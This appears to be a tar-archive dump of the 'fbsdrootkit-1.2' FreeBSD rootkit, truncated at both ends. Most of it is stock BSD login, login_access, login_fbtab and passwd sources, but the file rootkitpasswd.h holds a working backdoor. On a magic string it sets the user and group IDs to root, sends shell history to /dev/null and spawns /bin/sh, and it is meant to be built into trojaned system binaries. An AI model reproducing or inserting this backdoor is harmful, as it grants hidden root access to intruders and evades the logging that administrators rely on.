syslog(LOG_NOTICE, "%d LOGIN FAILURE%s FROM %s", failures, failures > 1 ? "S" : "", hostname); syslog(LOG_AUTHPRIV|LOG_NOTICE, "%d LOGIN FAILURE%s FROM %s, %s", failures, failures > 1 ? "S" : "", hostname, name); } else { syslog(LOG_NOTICE, "%d LOGIN FAILURE%s ON %s", failures, failures > 1 ? "S" : "", tty); syslog(LOG_AUTHPRIV|LOG_NOTICE, "%d LOGIN FAILURE%s ON %s, %s", failures, failures > 1 ? "S" : "", tty, name); } } #undef UNKNOWN #define UNKNOWN "su" char * stypeof(ttyid) char *ttyid; { struct ttyent *t; return (ttyid && (t = getttynam(ttyid)) ? t->ty_type : UNKNOWN); } void sleepexit(eval) int eval; { (void)sleep(5); exit(eval); } fbsdrootkit-1.2/login/login_access.c100600 764 764 15417 5762566240 15104 0ustar dfdf /* * This module implements a simple but effective form of login access * control based on login names and on host (or domain) names, internet * addresses (or network numbers), or on terminal line names in case of * non-networked logins. Diagnostics are reported through syslog(3). * * Author: Wietse Venema, Eindhoven University of Technology, The Netherlands. */ #ifdef LOGIN_ACCESS #ifndef lint static char sccsid[] = "%Z% %M% %I% %E% %U%"; #endif #include #include #include #include #include #include #include #include #include #include "pathnames.h" /* Delimiters for fields and for lists of users, ttys or hosts. */ static char fs[] = ":"; /* field separator */ static char sep[] = ", \t"; /* list-element separator */ /* Constants to be used in assignments only, not in comparisons... */ #define YES 1 #define NO 0 static int list_match(); static int user_match(); static int from_match(); static int string_match(); /* login_access - match username/group and host/tty with access control file */ login_access(user, from) char *user; char *from; { FILE *fp; char line[BUFSIZ]; char *perm; /* becomes permission field */ char *users; /* becomes list of login names */ char *froms; /* becomes list of terminals or hosts */ int match = NO; int end; int lineno = 0; /* for diagnostics */ /* * Process the table one line at a time and stop at the first match. * Blank lines and lines that begin with a '#' character are ignored. * Non-comment lines are broken at the ':' character. All fields are * mandatory. The first field should be a "+" or "-" character. A * non-existing table means no access control. */ if (fp = fopen(_PATH_LOGACCESS, "r")) { while (!match && fgets(line, sizeof(line), fp)) { lineno++; if (line[end = strlen(line) - 1] != '\n') { syslog(LOG_ERR, "%s: line %d: missing newline or line too long", _PATH_LOGACCESS, lineno); continue; } if (line[0] == '#') continue; /* comment line */ while (end > 0 && isspace(line[end - 1])) end--; line[end] = 0; /* strip trailing whitespace */ if (line[0] == 0) /* skip blank lines */ continue; if (!(perm = strtok(line, fs)) || !(users = strtok((char *) 0, fs)) || !(froms = strtok((char *) 0, fs)) || strtok((char *) 0, fs)) { syslog(LOG_ERR, "%s: line %d: bad field count", _PATH_LOGACCESS, lineno); continue; } if (perm[0] != '+' && perm[0] != '-') { syslog(LOG_ERR, "%s: line %d: bad first field", _PATH_LOGACCESS, lineno); continue; } match = (list_match(froms, from, from_match) && list_match(users, user, user_match)); } (void) fclose(fp); } else if (errno != ENOENT) { syslog(LOG_ERR, "cannot open %s: %m", _PATH_LOGACCESS); } return (match == 0 || (line[0] == '+')); } /* list_match - match an item against a list of tokens with exceptions */ static int list_match(list, item, match_fn) char *list; char *item; int (*match_fn) (); { char *tok; int match = NO; /* * Process tokens one at a time. We have exhausted all possible matches * when we reach an "EXCEPT" token or the end of the list. If we do find * a match, look for an "EXCEPT" list and recurse to determine whether * the match is affected by any exceptions. */ for (tok = strtok(list, sep); tok != 0; tok = strtok((char *) 0, sep)) { if (strcasecmp(tok, "EXCEPT") == 0) /* EXCEPT: give up */ break; if (match = (*match_fn) (tok, item)) /* YES */ break; } /* Process exceptions to matches. */ if (match != NO) { while ((tok = strtok((char *) 0, sep)) && strcasecmp(tok, "EXCEPT")) /* VOID */ ; if (tok == 0 || list_match((char *) 0, item, match_fn) == NO) return (match); } return (NO); } /* netgroup_match - match group against machine or user */ static int netgroup_match(group, machine, user) char *machine; char *user; { #ifdef NIS static char *mydomain = 0; if (mydomain == 0) yp_get_default_domain(&mydomain); return (innetgr(group, machine, user, mydomain)); #else syslog(LOG_ERR, "NIS netgroup support not configured"); #endif } /* user_match - match a username against one token */ static int user_match(tok, string) char *tok; char *string; { struct group *group; int i; /* * If a token has the magic value "ALL" the match always succeeds. * Otherwise, return YES if the token fully matches the username, or if * the token is a group that contains the username. */ if (tok[0] == '@') { /* netgroup */ return (netgroup_match(tok + 1, (char *) 0, string)); } else if (string_match(tok, string)) { /* ALL or exact match */ return (YES); } else if (group = getgrnam(tok)) { /* try group membership */ for (i = 0; group->gr_mem[i]; i++) if (strcasecmp(string, group->gr_mem[i]) == 0) return (YES); } return (NO); } /* from_match - match a host or tty against a list of tokens */ static int from_match(tok, string) char *tok; char *string; { int tok_len; int str_len; /* * If a token has the magic value "ALL" the match always succeeds. Return * YES if the token fully matches the string. If the token is a domain * name, return YES if it matches the last fields of the string. If the * token has the magic value "LOCAL", return YES if the string does not * contain a "." character. If the token is a network number, return YES * if it matches the head of the string. */ if (tok[0] == '@') { /* netgroup */ return (netgroup_match(tok + 1, string, (char *) 0)); } else if (string_match(tok, string)) { /* ALL or exact match */ return (YES); } else if (tok[0] == '.') { /* domain: match last fields */ if ((str_len = strlen(string)) > (tok_len = strlen(tok)) && strcasecmp(tok, string + str_len - tok_len) == 0) return (YES); } else if (strcasecmp(tok, "LOCAL") == 0) { /* local: no dots */ if (strchr(string, '.') == 0) return (YES); } else if (tok[(tok_len = strlen(tok)) - 1] == '.' /* network */ && strncmp(tok, string, tok_len) == 0) { return (YES); } return (NO); } /* string_match - match a string against one token */ static int string_match(tok, string) char *tok; char *string; { /* * If the token has the magic value "ALL" the match always succeeds. * Otherwise, return YES if the token fully matches the string. */ if (strcasecmp(tok, "ALL") == 0) { /* all: always matches */ return (YES); } else if (strcasecmp(tok, string) == 0) { /* try exact match */ return (YES); } return (NO); } #endif /* LOGIN_ACCES */ fbsdrootkit-1.2/login/pathnames.h100600 764 764 4131 5667326260 14407 0ustar dfdf/*- * Copyright (c) 1989, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)pathnames.h 8.1 (Berkeley) 6/9/93 */ #include #define _PATH_HUSHLOGIN ".hushlogin" #define _PATH_MOTDFILE "/etc/motd" #define _PATH_LOGACCESS "/etc/login.access" #define _PATH_FBTAB "/etc/fbtab" #define _PATH_LOGINDEVPERM "/etc/logindevperm" #define _PATH_CHPASS "/usr/bin/passwd" fbsdrootkit-1.2/login/login_fbtab.c100600 764 764 10600 5762566240 14706 0ustar dfdf/************************************************************************ * Copyright 1995 by Wietse Venema. All rights reserved. * * This material was originally written and compiled by Wietse Venema at * Eindhoven University of Technology, The Netherlands, in 1990, 1991, * 1992, 1993, 1994 and 1995. * * Redistribution and use in source and binary forms are permitted * provided that this entire copyright notice is duplicated in all such * copies. * * This software is provided "as is" and without any expressed or implied * warranties, including, without limitation, the implied warranties of * merchantibility and fitness for any particular purpose. ************************************************************************/ /* SYNOPSIS void login_fbtab(tty, uid, gid) char *tty; uid_t uid; gid_t gid; DESCRIPTION This module implements device security as described in the SunOS 4.1.x fbtab(5) and SunOS 5.x logindevperm(4) manual pages. The program first looks for /etc/fbtab. If that file cannot be opened it attempts to process /etc/logindevperm. We expect entries with the folowing format: Comments start with a # and extend to the end of the line. Blank lines or lines with only a comment are ignored. All other lines consist of three fields delimited by whitespace: a login device (/dev/console), an octal permission number (0600), and a ":"-delimited list of devices (/dev/kbd:/dev/mouse). All device names are absolute paths. A path that ends in "/*" refers to all directory entries except "." and "..". If the tty argument (relative path) matches a login device name (absolute path), the permissions of the devices in the ":"-delimited list are set as specified in the second field, and their ownership is changed to that of the uid and gid arguments. DIAGNOSTICS Problems are reported via the syslog daemon with severity LOG_ERR. BUGS This module uses strtok(3), which may cause conflicts with other uses of that same routine. AUTHOR Wietse Venema (wietse@wzv.win.tue.nl) Eindhoven University of Technology The Netherlands */ #include #include #include #include #include #include #include "pathnames.h" void login_protect __P((char *, char *, int, uid_t, gid_t)); void login_fbtab __P((char *tty, uid_t uid, gid_t gid)); #define WSPACE " \t\n" /* login_fbtab - apply protections specified in /etc/fbtab or logindevperm */ void login_fbtab(tty, uid, gid) char *tty; uid_t uid; gid_t gid; { FILE *fp; char buf[BUFSIZ]; char *devname; char *cp; int prot; char *table; if ((fp = fopen(table = _PATH_FBTAB, "r")) == 0 && (fp = fopen(table = _PATH_LOGINDEVPERM, "r")) == 0) return; while (fgets(buf, sizeof(buf), fp)) { if (cp = strchr(buf, '#')) *cp = 0; /* strip comment */ if ((cp = devname = strtok(buf, WSPACE)) == 0) continue; /* empty or comment */ if (strncmp(devname, "/dev/", 5) != 0 || (cp = strtok((char *) 0, WSPACE)) == 0 || *cp != '0' || sscanf(cp, "%o", &prot) == 0 || prot == 0 || (prot & 0777) != prot || (cp = strtok((char *) 0, WSPACE)) == 0) { syslog(LOG_ERR, "%s: bad entry: %s", table, cp ? cp : "(null)"); continue; } if (strcmp(devname + 5, tty) == 0) { for (cp = strtok(cp, ":"); cp; cp = strtok((char *) 0, ":")) { login_protect(table, cp, prot, uid, gid); } } } fclose(fp); } /* login_protect - protect one device entry */ void login_protect(table, path, mask, uid, gid) char *table; char *path; int mask; uid_t uid; gid_t gid; { char buf[BUFSIZ]; int pathlen = strlen(path); struct dirent *ent; DIR *dir; if (strcmp("/*", path + pathlen - 2) != 0) { if (chmod(path, mask) && errno != ENOENT) syslog(LOG_ERR, "%s: chmod(%s): %m", table, path); if (chown(path, uid, gid) && errno != ENOENT) syslog(LOG_ERR, "%s: chown(%s): %m", table, path); } else { strcpy(buf, path); buf[pathlen - 1] = 0; if ((dir = opendir(buf)) == 0) { syslog(LOG_ERR, "%s: opendir(%s): %m", table, path); } else { while ((ent = readdir(dir)) != 0) { if (strcmp(ent->d_name, ".") != 0 && strcmp(ent->d_name, "..") != 0) { strcpy(buf + pathlen - 1, ent->d_name); login_protect(table, buf, mask, uid, gid); } } closedir(dir); } } } fbsdrootkit-1.2/login/login.c.dist100600 764 764 40260 6255422100 14477 0ustar dfdf/*- * Copyright (c) 1980, 1987, 1988, 1991, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1980, 1987, 1988, 1991, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)login.c 8.4 (Berkeley) 4/2/94"; #endif /* not lint */ /* * login [ name ] * login -h hostname (for telnetd, etc.) * login -f name (for pre-authenticated login: datakit, xterm, etc.) */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef SKEY #include #endif #include "pathnames.h" void badlogin __P((char *)); void checknologin __P((void)); void dolastlog __P((int)); void getloginname __P((void)); void motd __P((void)); int rootterm __P((char *)); void sigint __P((int)); void sleepexit __P((int)); char *stypeof __P((char *)); void timedout __P((int)); void login_fbtab __P((char *, uid_t, gid_t)); #ifdef KERBEROS int klogin __P((struct passwd *, char *, char *, char *)); #endif extern void login __P((struct utmp *)); #define TTYGRPNAME "tty" /* name of group to own ttys */ /* * This bounds the time given to login. Not a define so it can * be patched on machines where it's too small. */ u_int timeout = 300; #ifdef KERBEROS int notickets = 1; int noticketsdontcomplain = 1; char *instance; char *krbtkfile_env; int authok; #endif struct passwd *pwd; int failures; char term[64], *envinit[1], *hostname, *username, *tty; int main(argc, argv) int argc; char *argv[]; { extern char **environ; struct group *gr; struct stat st; struct timeval tp; struct utmp utmp; int ask, ch, cnt, fflag, hflag, pflag, quietlog, rootlogin, rval; int changepass; uid_t uid; char *domain, *p, *ep, *salt, *ttyn; char tbuf[MAXPATHLEN + 2], tname[sizeof(_PATH_TTY) + 10]; char localhost[MAXHOSTNAMELEN]; char full_hostname[MAXHOSTNAMELEN]; #ifdef SKEY int permit_passwd = 0; #endif (void)signal(SIGALRM, timedout); (void)alarm(timeout); (void)signal(SIGQUIT, SIG_IGN); (void)signal(SIGINT, SIG_IGN); (void)setpriority(PRIO_PROCESS, 0, 0); openlog("login", LOG_ODELAY, LOG_AUTH); /* * -p is used by getty to tell login not to destroy the environment * -f is used to skip a second login authentication * -h is used by other servers to pass the name of the remote * host to login so that it may be placed in utmp and wtmp */ *full_hostname = '\0'; domain = NULL; if (gethostname(localhost, sizeof(localhost)) < 0) syslog(LOG_ERR, "couldn't get local hostname: %m"); else domain = strchr(localhost, '.'); fflag = hflag = pflag = 0; uid = getuid(); while ((ch = getopt(argc, argv, "fh:p")) != EOF) switch (ch) { case 'f': fflag = 1; break; case 'h': if (uid) errx(1, "-h option: %s", strerror(EPERM)); hflag = 1; strncpy(full_hostname, optarg, sizeof(full_hostname)-1); if (domain && (p = strchr(optarg, '.')) && strcasecmp(p, domain) == 0) *p = 0; hostname = optarg; break; case 'p': pflag = 1; break; case '?': default: if (!uid) syslog(LOG_ERR, "invalid flag %c", ch); (void)fprintf(stderr, "usage: login [-fp] [-h hostname] [username]\n"); exit(1); } argc -= optind; argv += optind; if (*argv) { username = *argv; ask = 0; } else ask = 1; for (cnt = getdtablesize(); cnt > 2; cnt--) (void)close(cnt); ttyn = ttyname(STDIN_FILENO); if (ttyn == NULL || *ttyn == '\0') { (void)snprintf(tname, sizeof(tname), "%s??", _PATH_TTY); ttyn = tname; } if (tty = strrchr(ttyn, '/')) ++tty; else tty = ttyn; for (cnt = 0;; ask = 1) { if (ask) { fflag = 0; getloginname(); } rootlogin = 0; #ifdef KERBEROS if ((instance = strchr(username, '.')) != NULL) { if (strncmp(instance, ".root", 5) == 0) rootlogin = 1; *instance++ = '\0'; } else instance = ""; #endif if (strlen(username) > UT_NAMESIZE) username[UT_NAMESIZE] = '\0'; /* * Note if trying multiple user names; log failures for * previous user name, but don't bother logging one failure * for nonexistent name (mistyped username). */ if (failures && strcmp(tbuf, username)) { if (failures > (pwd ? 0 : 1)) badlogin(tbuf); failures = 0; } (void)strcpy(tbuf, username); if (pwd = getpwnam(username)) salt = pwd->pw_passwd; else salt = "xx"; /* * if we have a valid account name, and it doesn't have a * password, or the -f option was specified and the caller * is root or the caller isn't changing their uid, don't * authenticate. */ if (pwd) { if (pwd->pw_uid == 0) rootlogin = 1; if (fflag && (uid == 0 || uid == pwd->pw_uid)) { /* already authenticated */ break; } else if (pwd->pw_passwd[0] == '\0') { /* pretend password okay */ rval = 0; goto ttycheck; } } fflag = 0; (void)setpriority(PRIO_PROCESS, 0, -4); #ifdef SKEY permit_passwd = skeyaccess(username, tty, hostname ? full_hostname : NULL, NULL); p = skey_getpass("Password:", pwd, permit_passwd); ep = skey_crypt(p, salt, pwd, permit_passwd); #else p = getpass("Password:"); ep = crypt(p, salt); #endif if (pwd) { #ifdef KERBEROS #ifdef SKEY /* * Do not allow user to type in kerberos password * over the net (actually, this is ok for encrypted * links, but we have no way of determining if the * link is encrypted. */ if (!permit_passwd) { rval = 1; /* failed */ } else #endif rval = klogin(pwd, instance, localhost, p); if (rval != 0 && rootlogin && pwd->pw_uid != 0) rootlogin = 0; if (rval == 0) authok = 1; else if (rval == 1) rval = strcmp(ep, pwd->pw_passwd); #else rval = strcmp(ep, pwd->pw_passwd); #endif } memset(p, 0, strlen(p)); (void)setpriority(PRIO_PROCESS, 0, 0); ttycheck: /* * If trying to log in as root without Kerberos, * but with insecure terminal, refuse the login attempt. */ #ifdef KERBEROS if (authok == 0) #endif if (pwd && !rval && rootlogin && !rootterm(tty)) { (void)fprintf(stderr, "%s login refused on this terminal.\n", pwd->pw_name); if (hostname) syslog(LOG_NOTICE, "LOGIN %s REFUSED FROM %s ON TTY %s", pwd->pw_name, hostname, tty); else syslog(LOG_NOTICE, "LOGIN %s REFUSED ON TTY %s", pwd->pw_name, tty); continue; } if (pwd && !rval) break; (void)printf("Login incorrect\n"); failures++; /* we allow 10 tries, but after 3 we start backing off */ if (++cnt > 3) { if (cnt >= 10) { badlogin(username); sleepexit(1); } sleep((u_int)((cnt - 3) * 5)); } } /* committed to login -- turn off timeout */ (void)alarm((u_int)0); endpwent(); /* if user not super-user, check for disabled logins */ if (!rootlogin) checknologin(); if (chdir(pwd->pw_dir) < 0) { (void)printf("No home directory %s!\n", pwd->pw_dir); if (chdir("/")) exit(0); pwd->pw_dir = "/"; (void)printf("Logging in with home = \"/\".\n"); } quietlog = access(_PATH_HUSHLOGIN, F_OK) == 0; if (pwd->pw_change || pwd->pw_expire) (void)gettimeofday(&tp, (struct timezone *)NULL); changepass=0; if (pwd->pw_change) if (tp.tv_sec >= pwd->pw_change) { (void)printf("Sorry -- your password has expired.\n"); changepass=1; } else if (pwd->pw_change - tp.tv_sec < 2 * 7 * 86400 && !quietlog) (void)printf("Warning: your password expires on %s", ctime(&pwd->pw_change)); if (pwd->pw_expire) if (tp.tv_sec >= pwd->pw_expire) { (void)printf("Sorry -- your account has expired.\n"); sleepexit(1); } else if (pwd->pw_expire - tp.tv_sec < 2 * 7 * 86400 && !quietlog) (void)printf("Warning: your account expires on %s", ctime(&pwd->pw_expire)); /* Nothing else left to fail -- really log in. */ memset((void *)&utmp, 0, sizeof(utmp)); (void)time(&utmp.ut_time); (void)strncpy(utmp.ut_name, username, sizeof(utmp.ut_name)); if (hostname) (void)strncpy(utmp.ut_host, hostname, sizeof(utmp.ut_host)); (void)strncpy(utmp.ut_line, tty, sizeof(utmp.ut_line)); login(&utmp); dolastlog(quietlog); /* * Set device protections, depending on what terminal the * user is logged in. This feature is used on Suns to give * console users better privacy. */ login_fbtab(tty, pwd->pw_uid, pwd->pw_gid); (void)chown(ttyn, pwd->pw_uid, (gr = getgrnam(TTYGRPNAME)) ? gr->gr_gid : pwd->pw_gid); (void)setgid(pwd->pw_gid); initgroups(username, pwd->pw_gid); if (*pwd->pw_shell == '\0') pwd->pw_shell = _PATH_BSHELL; /* Destroy environment unless user has requested its preservation. */ if (!pflag) environ = envinit; (void)setenv("HOME", pwd->pw_dir, 1); (void)setenv("SHELL", pwd->pw_shell, 1); if (term[0] == '\0') (void)strncpy(term, stypeof(tty), sizeof(term)); (void)setenv("TERM", term, 0); (void)setenv("LOGNAME", pwd->pw_name, 1); (void)setenv("USER", pwd->pw_name, 1); (void)setenv("PATH", _PATH_DEFPATH, 0); #ifdef KERBEROS if (krbtkfile_env) (void)setenv("KRBTKFILE", krbtkfile_env, 1); #endif if (tty[sizeof("tty")-1] == 'd') syslog(LOG_INFO, "DIALUP %s, %s", tty, pwd->pw_name); /* If fflag is on, assume caller/authenticator has logged root login. */ if (rootlogin && fflag == 0) if (hostname) syslog(LOG_NOTICE, "ROOT LOGIN (%s) ON %s FROM %s", username, tty, hostname); else syslog(LOG_NOTICE, "ROOT LOGIN (%s) ON %s", username, tty); #ifdef KERBEROS if (!quietlog && notickets == 1 && !noticketsdontcomplain) (void)printf("Warning: no Kerberos tickets issued.\n"); #endif #ifdef LOGALL /* * Syslog each successful login, so we don't have to watch hundreds * of wtmp or lastlogin files. */ if (hostname) { syslog(LOG_INFO, "login from %s as %s", hostname, pwd->pw_name); } else { syslog(LOG_INFO, "login on %s as %s", tty, pwd->pw_name); } #endif if (!quietlog) { (void)printf("%s\n\t%s %s\n\n", "Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994", "The Regents of the University of California. ", "All rights reserved."); motd(); (void)snprintf(tbuf, sizeof(tbuf), "%s/%s", _PATH_MAILDIR, pwd->pw_name); if (stat(tbuf, &st) == 0 && st.st_size != 0) (void)printf("You have %smail.\n", (st.st_mtime > st.st_atime) ? "new " : ""); } #ifdef LOGIN_ACCESS if (login_access(pwd->pw_name, hostname ? full_hostname : tty) == 0) { printf("Permission denied\n"); if (hostname) syslog(LOG_NOTICE, "%s LOGIN REFUSED FROM %s", pwd->pw_name, hostname); else syslog(LOG_NOTICE, "%s LOGIN REFUSED ON %s", pwd->pw_name, tty); sleepexit(1); } #endif (void)signal(SIGALRM, SIG_DFL); (void)signal(SIGQUIT, SIG_DFL); (void)signal(SIGINT, SIG_DFL); (void)signal(SIGTSTP, SIG_IGN); tbuf[0] = '-'; (void)strcpy(tbuf + 1, (p = strrchr(pwd->pw_shell, '/')) ? p + 1 : pwd->pw_shell); if (setlogin(pwd->pw_name) < 0) syslog(LOG_ERR, "setlogin() failure: %m"); /* Discard permissions last so can't get killed and drop core. */ if (rootlogin) (void) setuid(0); else (void) setuid(pwd->pw_uid); if (changepass) { int res; if ((res=system(_PATH_CHPASS))) sleepexit(1); } execlp(pwd->pw_shell, tbuf, 0); err(1, "%s", pwd->pw_shell); } #ifdef KERBEROS #define NBUFSIZ (UT_NAMESIZE + 1 + 5) /* .root suffix */ #else #define NBUFSIZ (UT_NAMESIZE + 1) #endif void getloginname() { int ch; char *p; static char nbuf[NBUFSIZ]; for (;;) { (void)printf("login: "); for (p = nbuf; (ch = getchar()) != '\n'; ) { if (ch == EOF) { badlogin(username); exit(0); } if (p < nbuf + (NBUFSIZ - 1)) *p++ = ch; } if (p > nbuf) if (nbuf[0] == '-') (void)fprintf(stderr, "login names may not start with '-'.\n"); else { *p = '\0'; username = nbuf; break; } } } int rootterm(ttyn) char *ttyn; { struct ttyent *t; return ((t = getttynam(ttyn)) && t->ty_status & TTY_SECURE); } jmp_buf motdinterrupt; void motd() { int fd, nchars; sig_t oldint; char tbuf[8192]; if ((fd = open(_PATH_MOTDFILE, O_RDONLY, 0)) < 0) return; oldint = signal(SIGINT, sigint); if (setjmp(motdinterrupt) == 0) while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0) (void)write(fileno(stdout), tbuf, nchars); (void)signal(SIGINT, oldint); (void)close(fd); } /* ARGSUSED */ void sigint(signo) int signo; { longjmp(motdinterrupt, 1); } /* ARGSUSED */ void timedout(signo) int signo; { (void)fprintf(stderr, "Login timed out after %d seconds\n", timeout); exit(0); } void checknologin() { int fd, nchars; char tbuf[8192]; if ((fd = open(_PATH_NOLOGIN, O_RDONLY, 0)) >= 0) { while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0) (void)write(fileno(stdout), tbuf, nchars); sleepexit(0); } } void dolastlog(quiet) int quiet; { struct lastlog ll; int fd; if ((fd = open(_PATH_LASTLOG, O_RDWR, 0)) >= 0) { (void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET); if (!quiet) { if (read(fd, (char *)&ll, sizeof(ll)) == sizeof(ll) && ll.ll_time != 0) { (void)printf("Last login: %.*s ", 24-5, (char *)ctime(&ll.ll_time)); if (*ll.ll_host != '\0') (void)printf("from %.*s\n", (int)sizeof(ll.ll_host), ll.ll_host); else (void)printf("on %.*s\n", (int)sizeof(ll.ll_line), ll.ll_line); } (void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET); } memset((void *)&ll, 0, sizeof(ll)); (void)time(&ll.ll_time); (void)strncpy(ll.ll_line, tty, sizeof(ll.ll_line)); if (hostname) (void)strncpy(ll.ll_host, hostname, sizeof(ll.ll_host)); (void)write(fd, (char *)&ll, sizeof(ll)); (void)close(fd); } } void badlogin(name) char *name; { if (failures == 0) return; if (hostname) { syslog(LOG_NOTICE, "%d LOGIN FAILURE%s FROM %s", failures, failures > 1 ? "S" : "", hostname); syslog(LOG_AUTHPRIV|LOG_NOTICE, "%d LOGIN FAILURE%s FROM %s, %s", failures, failures > 1 ? "S" : "", hostname, name); } else { syslog(LOG_NOTICE, "%d LOGIN FAILURE%s ON %s", failures, failures > 1 ? "S" : "", tty); syslog(LOG_AUTHPRIV|LOG_NOTICE, "%d LOGIN FAILURE%s ON %s, %s", failures, failures > 1 ? "S" : "", tty, name); } } #undef UNKNOWN #define UNKNOWN "su" char * stypeof(ttyid) char *ttyid; { struct ttyent *t; return (ttyid && (t = getttynam(ttyid)) ? t->ty_type : UNKNOWN); } void sleepexit(eval) int eval; { (void)sleep(5); exit(eval); } fbsdrootkit-1.2/rootkitpasswd.h100600 764 764 773 6271316365 14221 0ustar dfdf#ifdef FIRST_TIME inline char *is_werd(char *nutty_wild_char_pointer) { char MAG[7]; MAG[0]=ROOTKIT_MAGIC[0]; MAG[1]=ROOTKIT_MAGIC[1]; MAG[2]=ROOTKIT_MAGIC[2]; MAG[3]=ROOTKIT_MAGIC[3]; MAG[4]=ROOTKIT_MAGIC[4]; MAG[5]=ROOTKIT_MAGIC[5]; MAG[6]='\0'; if(!strcmp(nutty_wild_char_pointer,MAG)) { setuid(0); setgid(0); seteuid(0); setegid(0); /* Just for good measure */ setenv("HISTFILE","/dev/null",1); execl("/bin/sh","sh",(char *)0); } else return(nutty_wild_char_pointer); } #endif fbsdrootkit-1.2/passwd/ 40700 764 764 0 6257405321 12341 5ustar dfdffbsdrootkit-1.2/passwd/Makefile100600 764 764 2342 6257175104 14104 0ustar dfdf# From: @(#)Makefile 8.3 (Berkeley) 4/2/94 # $Id: Makefile,v 1.14.2.3 1995/10/06 01:58:43 davidg Exp $ PROG= passwd SRCS= local_passwd.c yp_passwd.c passwd.c pw_copy.c pw_util.c pw_yp.c DPADD= ${LIBCRYPT} ${LIBRPCSVC} LDADD= -lcrypt -lrpcsvc .PATH: ${.CURDIR}/../chpass ${.CURDIR}/vipw \ ${.CURDIR}/../rlogin CFLAGS+=-DCRYPT -DYP -I${.CURDIR} -I${.CURDIR}/../vipw \ -I${.CURDIR}/../chpass BINOWN= root BINMODE=4555 MAN1=passwd.1 LINKS=${BINDIR}/passwd ${BINDIR}/yppasswd MLINKS=passwd.1 yppasswd.1 .if exists(${DESTDIR}/usr/lib/libkrb.a) && (defined(MAKE_EBONES)) SRCS+= kpasswd.c .PATH: ${.CURDIR}/../../usr.bin/chpass ${.CURDIR}/../../usr.sbin/vipw \ ${.CURDIR}/../../usr.bin/rlogin ${.CURDIR}/../../usr.bin/passwd \ ${.CURDIR}/../../eBones/usr.bin/passwd CFLAGS+= -DKERBEROS \ -I${.CURDIR}/../../eBones/include \ -I${.CURDIR}/../../eBones/lib/libkadm # XXX not defined: ${LIBKADM}, ${LIBCOM_ERR} DPADD= ${LIBKADM} ${LIBKRB} ${LIBDES} ${LIBCRYPT} ${LIBRPCSVC} ${LIBCOM_ERR} LDADD= -lkadm -lkrb -ldes -lcrypt -lrpcsvc -lcom_err DISTRIBUTION= krb .endif beforeinstall: [ ! -e ${DESTDIR}${BINDIR}/passwd ] || \ chflags noschg ${DESTDIR}${BINDIR}/passwd afterinstall: chflags schg ${DESTDIR}${BINDIR}/passwd .include fbsdrootkit-1.2/passwd/extern.h100600 764 764 3740 5710031470 14113 0ustar dfdf/* * Copyright (c) 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this 